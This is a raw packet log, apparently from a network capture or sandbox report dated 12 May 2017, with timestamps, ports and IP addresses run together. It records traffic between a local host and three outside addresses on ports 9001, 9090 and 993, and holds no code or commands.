May 12, 2017 18:54:57.584458113 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:57.584574938 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:57.711535931 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.747643948 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.747669935 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.747685909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.747755051 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.750036955 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.750056982 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.750075102 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.750149965 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.750166893 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.750180960 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.750181913 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.750219107 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.750236988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.750624895 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.753952980 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.800453901 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:57.800538063 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:57.862087965 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.862796068 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.862832069 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897229910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897263050 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897598028 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.897619009 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897864103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897882938 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897959948 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.897974968 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.897993088 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.898010969 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.898022890 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.898313999 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.899161100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.899177074 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.899188995 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.899475098 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.899739027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.899915934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.899940014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.900237083 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.900263071 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.901496887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.901530027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.901884079 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.901906967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.906301975 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.906332016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:57.906591892 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:57.906614065 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.003423929 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.003524065 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.003545046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.008455992 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:58.008526087 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:58.041574955 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.041600943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.041665077 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.041683912 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.046566010 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.046591997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.046652079 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.046665907 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.050826073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.050851107 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.050945997 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.050960064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.053306103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.053402901 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.053416967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.053436995 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.053453922 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.055207968 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.055236101 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.055294991 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.055308104 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.055476904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.055496931 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.055679083 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.055695057 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.056277037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.056303978 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.056364059 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.056380987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.056395054 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.060480118 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.284447908 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.508470058 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.508603096 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:58.680461884 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:58.680550098 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:58.956481934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:58.956566095 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:59.708456039 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:59.708566904 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:00.444462061 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:00.444529057 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:00.752454996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:00.752517939 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.108449936 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.108568907 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.659929991 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.670319080 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.670346022 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670358896 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670366049 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670372009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670378923 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670383930 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670388937 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670397043 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670402050 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670490980 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.670510054 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670519114 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670525074 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670531034 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670547962 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670553923 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670559883 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670636892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670665979 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670743942 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.670762062 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670770884 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670775890 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670783043 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670785904 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670789957 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670794010 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670798063 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.670802116 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672806978 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.672832012 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672843933 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672849894 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672853947 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672858953 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672863007 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672869921 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672873974 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.672880888 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.676547050 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.676589012 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.676600933 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.676608086 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.676615000 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.676623106 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.680850029 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.697680950 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.697710037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.697725058 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.697731972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.698076963 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.710308075 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.710359097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710383892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710390091 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710393906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710400105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710406065 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710514069 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.710530996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710539103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710542917 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710546970 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710551023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710555077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711618900 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.711643934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711654902 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711661100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711666107 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711673021 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711678028 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712130070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.712146997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712156057 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712162971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712172031 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712176085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712182045 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712523937 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.712541103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712549925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712557077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712565899 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712570906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712577105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712769985 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.712785006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712793112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712799072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712804079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712810040 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712816000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714137077 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.714235067 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.714252949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714263916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714270115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714276075 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714282990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714288950 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.715537071 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.715634108 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.716232061 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.716253996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.718453884 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.718491077 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718503952 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718509912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718517065 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718602896 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.718810081 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.718825102 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719307899 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.719321966 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719331026 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719336987 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719342947 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719348907 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719355106 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719361067 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719367027 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719372034 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719449997 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.719464064 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719471931 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719477892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719484091 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719490051 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719495058 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719500065 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719506025 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719511032 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719516993 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719661951 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.719675064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719682932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719688892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719772100 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.719786882 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719794989 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719800949 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719806910 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719813108 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719818115 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719824076 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719829082 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719835043 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719840050 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719861031 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.720597982 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.720614910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720624924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720630884 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720637083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720642090 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720647097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720747948 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.720763922 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720772028 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720777988 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720782995 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720788956 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720794916 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720801115 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720807076 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720813036 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720818996 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.720838070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.720849991 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720858097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720864058 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720870018 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720875978 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720880985 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720886946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721349955 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.721370935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:03.721491098 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.721508026 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.721525908 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.721540928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721549034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721556902 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721563101 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721570015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721575022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721580982 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721669912 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.721755981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.721772909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721781015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721786976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721791983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721797943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721805096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.721811056 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722469091 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.722620964 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.722639084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722650051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722656965 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722664118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722670078 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722676039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722681999 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722834110 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.722848892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722857952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722863913 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722870111 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722875118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722881079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.722886086 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.723747969 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.723850012 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.725661039 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.725915909 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.725940943 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.725955009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.727032900 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.727215052 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.760489941 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:03.760680914 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.760716915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:03.764453888 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.764478922 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.764652967 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.764693975 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882534981 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882574081 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882582903 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.882827997 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.884190083 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.884224892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.884244919 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.884308100 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.886853933 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.886877060 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.886959076 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.886979103 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.891691923 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.891712904 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.891856909 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.891875029 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.917974949 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.918004990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.918015003 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.918168068 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.918203115 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.936467886 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.965814114 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.966037989 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.966073990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975198984 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975222111 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975311041 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975327015 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975347042 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.975346088 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.975373030 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.976541996 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.979590893 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.979614019 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.979624033 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.979815006 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.984472990 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.984492064 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.984499931 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.984654903 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.991095066 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.991134882 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.991144896 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.991297007 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.991322041 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.992453098 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.992485046 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.992597103 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.992614031 CEST909049200138.68.0.4192.168.1.16
